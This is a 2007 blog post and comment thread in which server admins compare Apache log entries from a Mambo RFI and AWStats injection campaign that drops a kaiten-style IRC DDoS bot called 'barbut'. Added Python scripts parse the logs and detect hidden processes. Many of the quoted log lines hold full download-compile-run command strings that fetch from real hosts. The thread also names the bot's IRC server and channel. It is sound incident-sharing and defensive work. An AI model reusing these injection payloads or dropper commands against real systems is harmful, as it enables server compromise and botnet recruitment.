I wanted to share this interesting hit from my apache2 error log:
[Tue Nov 20 17:49:49 2007] [error] [client 200.253.204.130] Invalid URI in request GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1
[Tue Nov 20 17:49:50 2007] [error] [client 200.253.204.130] Invalid URI in request GET arbut ;rm -f barbut barbut.c HTTP/1.1
[Tue Nov 20 17:49:52 2007] [error] [client 200.253.204.130] script '/var/www/login/index2.php' not found or unable to stat
[Tue Nov 20 17:49:53 2007] [error] [client 200.253.204.130] Invalid URI in request GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1
[Tue Nov 20 17:49:54 2007] [error] [client 200.253.204.130] Invalid URI in request GET ;rm -f barbut barbut.c HTTP/1.1
Here is the whois for crekom.com:
domain: crekom.com
status: ACTIVE
owner-c: LULU-326746
admin-c: LULU-326746
tech-c: LULU-326746
zone-c: LULU-326746
nserver: NS5.NAMESERVERSERVICE.DE
nserver: NS6.NAMESERVERSERVICE.DE
created: 2003-12-24 07:10:27
expire: 2007-12-24 00:00:00 (registry time)
changed: 2006-12-26 02:51:47
[owner-c] handle: 326746
[owner-c] type: PERSON
[owner-c] title:
[owner-c] fname: Wolfgang
[owner-c] lname: Cremer
[owner-c] org: Crekom GmbH
[owner-c] address: Blumenrather Strasse 70
[owner-c] city: Alsdorf
[owner-c] pcode: 52477
[owner-c] country: DE
[owner-c] state: Nordrhein-Westfalen
I have not been able to get an active link to the C source, but if you find it, I’d appreciate it if you could post it in a comment.
Update: FWIW, I am pretty sure that this fellow used a port scan on port 80, and didn’t access any domain names. The entry in my log file is associated with my IP, not with any domain.
The script apparently failed here, but jt commented and was able to get the uncompiled C source before it disappeared from the host server. jt’s comment described the source code:
the DDoS bot connects to the IRC server at 217.79.190.56, joins channel #pulamea with key bleh. All of the DDoS bots seem to have faked ident responses set as follows:
#define FAKENAME "-bash" // What you want this to hide as
Links:
Kaiten source: http://packetstormsecurity.nl/irc/kaiten.c
Sophos warning: http://www.sophos.com/security/analyses/trojkaitenw.html
Please continue to share your observations…
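The same probe turns up in three log shapes across this post and its comments: Apache error_log "Invalid URI in request" entries, access_log entries for the Mambo/Joomla mosConfig_absolute_path remote file inclusion, and (in Dandrake's comment) the AWStats awstats.pl configdir pipe injection. The following Python is an added example, not code from the post's author: it parses both Apache log formats, tags each request with the exploit signature it matches, pulls out the URL the payload is fetched from, and marks request lines that Apache rejects with 400 because the request-URI is relative. The sample lines are constructed from entries quoted on this page, and the signature names are my own.

```python
"""Triage Apache logs for the Mambo RFI / AWStats probes that drop "barbut".

Added example; not code from the original post. SAMPLE_LOG is constructed
from entries quoted in the post and comments so the script runs offline;
pass your own access_log / error_log lines to scan() for real use.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache common/combined access log: ip ident user [ts] "request" status bytes
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}|-) \S+'
)
# Apache 2.0/2.2 error_log: [ts] [error] [client ip] message
ERROR_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] (?P<msg>.*)$'
)
INVALID_URI = "Invalid URI in request "

# Signatures are applied to the percent-decoded request line.
SIGNATURES = {
    # Mambo/Joomla remote file inclusion through the mosConfig_absolute_path global
    "mambo_rfi": re.compile(r"mosConfig_absolute_path=(?:https?|ftp)://", re.I),
    # AWStats awstats.pl configdir parameter: a leading '|' turns it into a shell pipe
    "awstats_cmdinj": re.compile(r"awstats\.pl\?configdir=\|", re.I),
    # download-then-run chain staged in /tmp, as in every probe on this page
    "dropper_chain": re.compile(r"\bcd\s+/tmp\s*;.*\b(?:wget|curl|fetch)\b", re.I),
}
# Payload source: the argument of wget, or the URL handed to the RFI parameter
DOWNLOAD_RE = re.compile(r'(?:\bwget\s+|mosConfig_absolute_path=)(\S+?)(?=[;&|\s"]|$)', re.I)


def parse_line(line):
    """Return (client_ip, request_line_or_None) for one log line, or None if unparseable."""
    m = ACCESS_RE.match(line)
    if m:
        return m.group("ip"), m.group("req")
    m = ERROR_RE.match(line)
    if m:
        msg = m.group("msg")
        # Only "Invalid URI" entries carry the request line; "File does not exist" etc. do not.
        return m.group("ip"), msg[len(INVALID_URI):] if msg.startswith(INVALID_URI) else None
    return None


def classify(request):
    """Return (set of signature names, list of payload URLs) for a raw request line."""
    decoded = unquote(request)
    tags = {name for name, rx in SIGNATURES.items() if rx.search(decoded)}
    # Apache takes the second whitespace-separated token as the request-URI and answers
    # 400 "Invalid URI in request" when it is neither "/..." nor an absolute URL. The
    # scanner's unencoded spaces and relative "cmd.gif?..." URIs trip this, so those
    # command strings never reached any script; the tag records that.
    parts = request.split(" ")
    if len(parts) >= 2 and parts[1] != "*" and not (parts[1].startswith("/") or "://" in parts[1]):
        tags.add("relative_uri_400")
    return tags, DOWNLOAD_RE.findall(decoded)


def scan(lines):
    """Aggregate hits per client IP: {ip: {"tags": set, "urls": set, "lines": int}}."""
    report = defaultdict(lambda: {"tags": set(), "urls": set(), "lines": 0})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[1] is None:
            continue
        ip, request = parsed
        tags, urls = classify(request)
        if tags & set(SIGNATURES):  # ignore lines that match no exploit signature
            report[ip]["tags"] |= tags
            report[ip]["urls"].update(urls)
            report[ip]["lines"] += 1
    return dict(report)


# Constructed sample, modelled on the entries quoted on this page.
SAMPLE_LOG = [
    "[Tue Nov 20 17:49:49 2007] [error] [client 200.253.204.130] Invalid URI in request GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1",
    "[Tue Nov 20 17:49:52 2007] [error] [client 200.253.204.130] script '/var/www/login/index2.php' not found or unable to stat",
    '62.105.180.178 - - [21/Nov/2007:23:02:47 +0100] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.com/cmd.gif HTTP/1.1" 404 287',
    '62.105.180.178 - - [21/Nov/2007:23:02:48 +0100] "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut ; HTTP/1.1" 400 371',
    '66.236.209.227 - - [19/Nov/2007:04:51:42 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 299',
    '71.179.181.241 - - [21/Nov/2007:19:21:37 +0100] "GET /favicon.ico HTTP/1.1" 404 289',  # benign, must not be flagged
]

if __name__ == "__main__":
    for ip, info in sorted(scan(SAMPLE_LOG).items()):
        print(ip, sorted(info["tags"]), sorted(info["urls"]), info["lines"])
```

Reading the report against the logs in this thread: the include request itself (`/index.php?...mosConfig_absolute_path=http://crekom.com/cmd.gif`) drew a 404 on every host here because no Mambo was installed, and the follow-up lines that carry the shell commands were refused with 400 before reaching any script, which is why the attempts in these logs went nowhere. The download URLs it extracts (crekom.com, 85.114.128.21, 217.79.176.126 on this page) are what you would block or go looking for in outbound proxy logs.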

6 responses so far
1 jt // Nov 21, 2007 at 8:52 am
This attempted to access my home cable server as well. He looks to be coming from both 217.128.160.150 and 62.105.180.178. He also attempts to get the DDoS program from the following IP address:
Compiled Version: http://85.114.128.21/barbut
UnCompiled Version: http://85.114.128.21/barbut.c
I have the uncompiled version of this now, and the innards look as follows:
the DDoS bot connects to the IRC server at 217.79.190.56, joins channel #pulamea with key bleh. All of the DDoS bots seem to have faked ident responses set as follows:
#define FAKENAME "-bash" // What you want this to hide as
2 Dark // Nov 21, 2007 at 6:21 pm
Hey man, I have the exact same guy I think
71.179.181.241 - - [21/Nov/2007:19:21:37 +0100] "GET /?mosmsg=Incorrect%20Username,%20Password,%20or%20Access%20Level.%20Please%20try%20again HTTP/1.1" 200 246
71.179.181.241 - - [21/Nov/2007:19:21:37 +0100] "GET /favicon.ico HTTP/1.1" 404 289
81.82.2.73 - - [21/Nov/2007:21:31:04 +0100] "GET / HTTP/1.1" 200 246
81.82.2.73 - - [21/Nov/2007:21:31:23 +0100] "GET / HTTP/1.1" 304 -
62.105.180.178 - - [21/Nov/2007:23:02:47 +0100] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.com/cmd.gif HTTP/1.1" 404 287
62.105.180.178 - - [21/Nov/2007:23:02:48 +0100] "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut ; HTTP/1.1" 400 371
62.105.180.178 - - [21/Nov/2007:23:02:50 +0100] "GET rm -f barbut barbut.c HTTP/1.1" 400 371
62.105.180.178 - - [21/Nov/2007:23:02:51 +0100] "GET /mambo//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.com/ HTTP/1.1" 404 294
62.105.180.178 - - [21/Nov/2007:23:02:52 +0100] "GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1" 400 371
62.105.180.178 - - [21/Nov/2007:23:02:53 +0100] "GET arbut ;rm -f barbut barbut.c HTTP/1.1" 400 371
62.105.180.178 - - [21/Nov/2007:23:02:57 +0100] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.com/cmd.gi HTTP/1.1" 404 288
62.105.180.178 - - [21/Nov/2007:23:02:58 +0100] "GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1" 400 371
62.105.180.178 - - [21/Nov/2007:23:03:00 +0100] "GET ;rm -f barbut barbut.c HTTP/1.1" 400 371
That’s my log. Same 62.105.180.178 IP. Seems like a script kiddy to me. Doesn’t know what he’s doing. He’s attacking an OpenBSD server here using a script (see the timestamps).
3 Magnus // Nov 22, 2007 at 4:01 am
I also got the probe:
[Wed Nov 21 04:24:49 2007] [error] [client 190.54.35.179] Invalid URI in request GET rm -f barbut barbut.c HTTP/1.1
[Wed Nov 21 04:24:50 2007] [error] [client 190.54.35.179] File does not exist: /var/www/html/gr8.nu/mambo
[Wed Nov 21 04:24:51 2007] [error] [client 190.54.35.179] Invalid URI in request GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1
[Wed Nov 21 04:24:52 2007] [error] [client 190.54.35.179] Invalid URI in request GET arbut ;rm -f barbut barbut.c HTTP/1.1
[Wed Nov 21 04:24:54 2007] [error] [client 190.54.35.179] script '/var/www/html/gr8.nu/index2.php' not found or unable to stat
[Wed Nov 21 04:24:55 2007] [error] [client 190.54.35.179] Invalid URI in request GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1
[Wed Nov 21 04:24:56 2007] [error] [client 190.54.35.179] Invalid URI in request GET ;rm -f barbut barbut.c HTTP/1.1
4 plook // Nov 25, 2007 at 12:37 pm
Same here, coming from IP: 200.253.204.130
[Tue Nov 20 14:20:05 2007] [error] [client 200.253.204.130] script '/var/www/domain.com/index.php' not found or unable to stat
[Tue Nov 20 14:20:08 2007] [error] [client 200.253.204.130] Invalid URI in request GET rm -f barbut barbut.c HTTP/1.1
[Tue Nov 20 14:20:09 2007] [error] [client 200.253.204.130] File does not exist: /var/www/domain.com/mambo
[Tue Nov 20 14:20:10 2007] [error] [client 200.253.204.130] Invalid URI in request GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1
[Tue Nov 20 14:20:11 2007] [error] [client 200.253.204.130] Invalid URI in request GET arbut ;rm -f barbut barbut.c HTTP/1.1
[Tue Nov 20 14:20:13 2007] [error] [client 200.253.204.130] script '/var/www/domain.com/index2.php' not found or unable to stat
[Tue Nov 20 14:20:14 2007] [error] [client 200.253.204.130] Invalid URI in request GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1
[Tue Nov 20 14:20:15 2007] [error] [client 200.253.204.130] Invalid URI in request GET ;rm -f barbut barbut.c HTTP/1.1
5 Marvy // Nov 25, 2007 at 5:21 pm
This guy has run up $6000 worth of traffic on one of our servers. I have a copy of the barbut.c code if you need it.
6 Dandrake // Dec 13, 2007 at 3:37 am
Same here:
66.236.209.227 - - [19/Nov/2007:04:51:42 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 299
66.236.209.227 - - [19/Nov/2007:04:51:43 +0200] "GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 291
66.236.209.227 - - [19/Nov/2007:04:51:44 +0200] "GET /awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 299
66.236.209.227 - - [19/Nov/2007:04:51:45 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;echo| HTTP/1.1" 404 307
62.105.180.178 - - [19/Nov/2007:21:09:30 +0200] "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut ; HTTP/1.1" 400 374
62.105.180.178 - - [19/Nov/2007:21:09:32 +0200] "GET rm -f barbut barbut.c HTTP/1.1" 400 374
62.105.180.178 - - [19/Nov/2007:21:09:38 +0200] "GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1" 400 374
62.105.180.178 - - [19/Nov/2007:21:09:42 +0200] "GET arbut ;rm -f barbut barbut.c HTTP/1.1" 400 374
62.105.180.178 - - [19/Nov/2007:21:09:44 +0200] "GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1" 400 374
62.105.180.178 - - [19/Nov/2007:21:09:45 +0200] "GET ;rm -f barbut barbut.c HTTP/1.1" 400 374
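Two details in this thread matter if you suspect the dropper actually ran somewhere: jt's comment shows the bot is built with FAKENAME "-bash", which in the kaiten source means it overwrites its own argv[0] so that ps shows what looks like a login shell, and every command string quoted on this page unlinks the binary right after launching it (./barbut ;rm -f barbut barbut.c). Neither trick survives a look at /proc on Linux: /proc/<pid>/exe still resolves to the real file (with a " (deleted)" suffix once it has been removed) and /proc/<pid>/comm keeps the name the kernel assigned at exec. The Python below is an added example, not code from the post or from the bot's author; the three process records are constructed, and the indicator names are my own.

```python
"""Find processes hiding behind a fake argv[0] or running from a deleted binary.

Added example for this thread; not code from the post or the bot. findings()
is a pure check over a process record so it can be exercised offline; the
SAMPLES are constructed. scan_live() walks /proc on a Linux host.
"""
import os
from dataclasses import dataclass

# Directories a web-exploit dropper typically stages in (cd /tmp in every probe here).
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
DELETED = " (deleted)"
COMM_LEN = 15  # TASK_COMM_LEN is 16 including the NUL


@dataclass
class Proc:
    pid: int
    argv0: str  # first NUL-separated field of /proc/<pid>/cmdline (process-controlled)
    comm: str   # /proc/<pid>/comm, set by the kernel from the executable name at exec
    exe: str    # readlink of /proc/<pid>/exe, the file actually mapped as the program


def argv_name(argv0):
    """Program name as argv[0] presents it: basename, minus the '-' a login shell carries."""
    return os.path.basename(argv0).lstrip("-")


def findings(p):
    """Return indicator names for one process record; an empty list means nothing odd."""
    hits = []
    exe_deleted = p.exe.endswith(DELETED)
    exe_path = p.exe[: -len(DELETED)] if exe_deleted else p.exe
    exe_name = os.path.basename(exe_path)
    shown = argv_name(p.argv0)
    # argv[0] is writable by the process (kaiten's FAKENAME does exactly that); exe is not.
    if shown and exe_name and shown != exe_name:
        hits.append("argv0_mismatch")
    # comm is the executable's basename truncated to 15 chars unless changed via prctl.
    if p.comm and exe_name and p.comm != exe_name[:COMM_LEN]:
        hits.append("comm_mismatch")
    # "./barbut ;rm -f barbut" leaves a running process whose file no longer exists.
    if exe_deleted:
        hits.append("exe_deleted")
    if exe_path.startswith(WORLD_WRITABLE):
        hits.append("exe_in_tmp")
    return hits


def read_proc(pid):
    """Build a Proc from /proc/<pid>; raises OSError for kernel threads or vanished pids."""
    base = f"/proc/{pid}"
    with open(f"{base}/cmdline", "rb") as f:
        argv0 = f.read().split(b"\0", 1)[0].decode(errors="replace")
    with open(f"{base}/comm") as f:
        comm = f.read().rstrip("\n")
    return Proc(pid, argv0, comm, os.readlink(f"{base}/exe"))


def scan_live():
    """Walk /proc (Linux only) and return {pid: (Proc, indicators)} for suspicious entries."""
    out = {}
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            p = read_proc(int(name))
        except OSError:  # exited, or not ours to read
            continue
        hits = findings(p)
        if hits:
            out[p.pid] = (p, hits)
    return out


# Constructed records: a real login shell, the bot as it would appear, an ordinary daemon.
SAMPLES = [
    Proc(1234, "-bash", "bash", "/bin/bash"),
    Proc(4321, "-bash", "barbut", "/tmp/barbut (deleted)"),
    Proc(777, "/usr/sbin/apache2", "apache2", "/usr/sbin/apache2"),
]

if __name__ == "__main__":
    for p in SAMPLES:
        print(p.pid, p.argv0, findings(p))
    if os.path.isdir("/proc"):
        for pid, (p, hits) in sorted(scan_live().items()):
            print(pid, p.argv0, p.exe, hits)
```

Expect some noise on a real box: a shell reached through a symlink (argv[0] "sh", exe "dash") trips argv0_mismatch, and any long-running service whose package was upgraded shows exe_deleted until restarted. The combination seen in the second sample, a "shell" whose exe points to a deleted file under /tmp, is the one to act on. A bot that renames itself with prctl(PR_SET_NAME) would also defeat the comm check, so the exe link is the indicator to trust.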